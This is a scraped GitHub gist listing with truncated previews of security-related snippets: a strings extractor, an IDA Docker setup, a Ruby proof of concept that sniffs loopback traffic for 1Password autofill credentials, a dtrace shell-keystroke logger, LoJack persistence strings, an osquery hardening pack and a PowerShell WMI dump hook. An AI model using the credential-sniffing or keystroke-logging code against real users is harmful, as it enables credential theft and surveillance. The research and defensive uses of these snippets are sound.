#Misc 50
###CAN HAS STDIO?
Source:
lctrcl lctrcl
lctrcl
/ strings.py
Created
April 7, 2016 12:54
— forked from williballenthin/strings.py
Extract ASCII and Unicode strings using Python.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| from collections import namedtuple | |
| ASCII_BYTE = " !\"#\$%&\'\(\)\*\+,-\./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\]\^_`abcdefghijklmnopqrstuvwxyz\{\|\}\\\~\t" | |
| String = namedtuple("String", ["s", "offset"]) | |
lctrcl
/ commands.sh
Created
April 11, 2016 09:07
— forked from williballenthin/commands.sh
Install IDA Pro under Wine in Docker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # build wine Docker image | |
| pushd wine; docker build -t wine .; popd | |
| # build x11 Docker image for IDA | |
| pushd ida; docker build -t wine/ida .; popd | |
| # demonstrate x11 forwarding works | |
| run -ti --rm -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix wine/ida xclock | |
| # interactive shell in container |
lctrcl
/ keybase.md
Created
May 5, 2016 14:01
I hereby claim:
- I am lctrcl on github.
- I am lctrcl (https://keybase.io/lctrcl) on keybase.
- I have a public key whose fingerprint is DFAE 3391 A0E2 6AEF E5C2 FB81 64FC 24A4 E521 1252
To claim this, I am signing this object:
lctrcl
/ steal_1password_creds.rb
Created
May 23, 2016 20:23
— forked from claudijd/steal_1password_creds.rb
Steal 1Password credentials from browser auto-fill PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Path setting slight of hand: | |
| $: << File.expand_path("../../lib", __FILE__) | |
| require 'packetfu' | |
| require 'json' | |
| capture_thread = Thread.new do | |
| cap = PacketFu::Capture.new(:iface => 'lo0', :start => true) | |
| cap.stream.each do |p| | |
| pkt = PacketFu::Packet.parse p | |
| if pkt.payload.include?("executeFillScript") |
lctrcl
/ keystrokes.d
Created
May 30, 2016 17:16
— forked from palmerabollo/keystrokes.d
dtrace keystrokes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/sbin/dtrace -s | |
| syscall::read:entry | |
| /execname == "sh" || execname == "ksh" || execname == "csh" || | |
| execname == "tcsh" || execname == "zsh" || execname == "bash"/ | |
| { | |
| self->start = timestamp; | |
| self->buf = arg1; | |
| self->len = arg2; | |
| } |
lctrcl
/ absolute_persistent_strings
Created
June 6, 2016 07:23
absolute lojack / persistence osx rat strings/locations
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| __cstring:00012376 00000019 C /tmp/.ctesservice.server | |
| /tmp/rpcnet.pid __cstring:00012D05 00000005 C .rpc | |
| __cstring:00012D0A 00000031 C /Library/LaunchDaemons/com.absolute.rpcnet.plist | |
| __cstring:00012D3B 0000001C C /Library/.rpcnet/rpcstartup | |
| __cstring:00012D57 00000015 C /usr/sbin/rpcstartup | |
| __cstring:00012D6C 00000019 C /Library/.rpcnet/rpc.net | |
| __cstring:00012D85 0000001B C /Users/Shared/.rpc/rpc.net | |
| __cstring:00012DA0 00000018 C /Library/.rpcnet/rpcset | |
| __cstring:00012DB8 0000001A C /Users/Shared/.rpc/rpcset | |
| __cstring:00012DD2 00000012 C /usr/sbin/rpc.net |
lctrcl
/ osxlockdown.conf
Created
July 26, 2016 13:40
— forked from arubdesu/osxlockdown.conf
query pack (v1) for https://github.com/SummitRoute/osxlockdown
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "packs": { | |
| "osxlockdown": { | |
| "platform": "darwin", | |
| "version": ".1", | |
| "queries": { | |
| "OS Updates": { | |
| "query": "select value from preferences where path = '/Library/Preferences/com.apple.SoftwareUpdate.plist' and key = 'LastSuccessfulDate';", | |
| "interval": "86400", | |
| "description": "Verify all Apple OS-bundled software has checked it's configured server recently", |
lctrcl
/ autodump_powershell_process.ps1
Created
August 9, 2016 07:45
— forked from mattifestation/autodump_powershell_process.ps1
Automatically capture a full PowerShell memory dump upon any PowerShell host process termination
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'PowerShellProcessStarted' | |
| Query = 'SELECT FileName, ProcessID FROM Win32_ModuleLoadTrace WHERE FileName LIKE "%System.Management.Automation%.dll"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $Filter = New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $EventFilterArgs | |
| $CommandLineConsumerArgs = @{ |
lctrcl
/ misc_updaters_on_osx.md
Last active
November 9, 2020 13:46
softwareupdate -i -a
brew update && brew upgrade && brew cleanup
brew info --json=v1 --installed | jq '.[] | .name + " " + .installed[].version' | grep HEAD | sed 's/"//g' | awk '{print $1}' | xargs brew reinstall
OlderNewer